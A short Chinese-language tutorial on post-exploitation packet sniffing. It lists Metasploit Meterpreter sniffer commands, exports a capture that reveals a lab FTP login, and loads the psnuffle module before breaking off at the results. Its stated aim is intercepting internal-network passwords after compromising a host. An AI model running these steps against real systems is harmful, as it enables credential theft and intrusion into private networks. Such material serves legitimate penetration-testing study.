为什么要进行数据包的捕获:当我们获得一个机器的权限后,可以通过对数据包的分析,判读内网中的服务,并且可以截获一些密码和重要数据,如:mail、http、svn、ftp等,为内网渗透打开大门。
利用msf下sniffer模块进行数据包捕获
msf获得session后使用命令load sniffer加载sniffer模块
接着可以使用命令sniffer_interfaces可以列举出网卡信息可以看到有两个网卡的信息使用命令
sniffer_start 2开始捕获网卡id 2的数据包命令
sniffer_stats 2查看网卡id 2的捕获状态在靶机中登录到其他主机的ftp服务中
命令sniffer_dump 2 test.cap将网卡id 2中捕获的信息导出到家目录的test.cap中,然后用wireshark打开
看到靶机登录了ip为192.168.83.91的ftp服务器中,并且账号为test,密码为123456命令
sniffer_stop 2停止捕获,sniffer_release 2将内存释放
使用psnuffle进行数据包分析
use auxiliary/sniffer/psnuffle使用该模块
set pcapfile /root/test.cap设置需要分析的数据包的路径
运行,结果:
